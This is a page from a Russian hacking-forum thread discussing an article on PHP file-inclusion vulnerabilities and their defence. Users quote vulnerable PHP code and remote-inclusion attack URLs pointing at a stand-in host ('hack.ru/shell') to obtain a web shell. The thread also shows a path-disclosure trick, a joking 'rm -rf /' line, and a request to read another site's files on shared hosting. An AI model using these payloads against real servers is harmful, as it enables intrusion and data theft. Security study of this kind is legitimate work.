HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу PHP-include и способы защиты
   
 
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 15.11.2008, 10:26
vladim1
Новичок
Регистрация: 12.11.2008
Сообщений: 12
С нами: 9207667

Репутация: -1
По умолчанию
обойти /nl,en/ я смог, проблема чтения локальных файлов это
Цитата:
open_basedir restriction
. Меня интересуют файлы другого сайта на этом хосте
 

  #12  
Старый 15.11.2008, 12:30
bombeg
Участник форума
Регистрация: 27.10.2008
Сообщений: 244
С нами: 9231271

Репутация: 428
По умолчанию
Цитата:
Так же рекомендую отредактировать файл php.ini:
и потом не меняя пользователя написать команду rm -rf /
 

  #13  
Старый 15.11.2008, 12:55
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию
Цитата:
Сообщение от vladim1  
обойти /nl,en/ я смог, проблема чтения локальных файлов это . Меня интересуют файлы другого сайта на этом хосте
На другие зайти через эту читалку не сможешь, а прочитать все файлы лежащие на этом сайте - без проблем!
 

  #14  
Старый 15.11.2008, 12:59
vladim1
Новичок
Регистрация: 12.11.2008
Сообщений: 12
С нами: 9207667

Репутация: -1
По умолчанию
Прочитал все, везде тупой file() -> echo, не один нормальный include
 

  #15  
Старый 16.11.2008, 19:37
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию
Немного доработал статью! Если есть еще какие-либо идеи - пишите, я добавлю!
 

  #16  
Старый 16.11.2008, 20:00
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию
PHP код:
function stripslashes_for_array(&$a
    { 
        foreach($a as $k=>$v
        { 
            $a[$k] = stripslashes($v); 
        } 
    } 

    if (!get_magic_quotes_gpc()) 
    { 
        stripslashes_for_array($_POST); 
        stripslashes_for_array($_GET); 
    } 
а если передать index.php?file[][][]=lol? раскрытие путей... Нужно рекурсивно вызывать функцию обработки массивов
 

  #17  
Старый 16.11.2008, 22:40
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию
Исправлено! Спасибо [Raz0r]
 

  #18  
Старый 12.02.2009, 17:32
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Зато инклуда не будет))А почему это сработает? Вывода же нет.
 

  #19  
Старый 17.02.2009, 16:41
cr0w
Познающий
Регистрация: 11.09.2008
Сообщений: 99
С нами: 9296966

Репутация: 585
По умолчанию
Цитата:
Сообщение от _Pantera_  
Теперь рассмотрим другой вариант инклуда. На этот раз необходимо, что б в файле php.ini
значение параметра allow_url_fopen было равно On, что и есть по умолчанию.

PHP код:
<?php
    $f=fopen("$file.php","r");
    
    while (!feof($f))
    {
        $s=fgets($f,255);
        echo $s;
    }
    
    fclose($f);
?>
Из-за того что переменная $file не была определена ранее, злоумышленник может произвести атаку:

Код:
http://site.ru/index.php?file=http://hack.ru/shell
В итоге опять получаем веб-шелл.



Следующий пример - использование функции readfile()

PHP код:
<?php
    readfile($file); 
?>
Функция readfile() считывает файл, имя которого передано ей в качестве параметра, и выводит его содержимое на экран.
В итоге опять получаем веб-шелл:

Код:
http://site.ru/index.php?file=http://hack.ru/shell

Теперь рассмотрим такой вариант:

PHP код:
<?php  
    echo implode(""file($file));
?>
С помощью функции implode() мы объединяем элементы массива в строку, а с помощью функции file() получаем содержимое файла в виде массива. В итоге опять имеем веб-шелл:
Код:
http://site.ru/index.php?file=http://hack.ru/shell.php
Эээ, а где тут "мы имеем веб-шелл"? Без eval'a заместо echo тут нигде не получишь шелла...
 

  #20  
Старый 17.02.2009, 19:12
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию
Цитата:
Сообщение от ChaaK  
странно, но работает o_O
Не тупи, это просто читалка, ты просто не делай file=http://test1.ru/shell.php а сделай shell.txt . Т.к. в первом случае ты просто выводишь на экран результат работы того файла на том сервере, а не запускаешь его код.

З.Ы.
jokester спс.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
Последний раз редактировалось Qwazar; 17.02.2009 в 19:21..
 
 
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41
Что такое Php? PAPA212 Болталка 13 28.12.2007 20:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...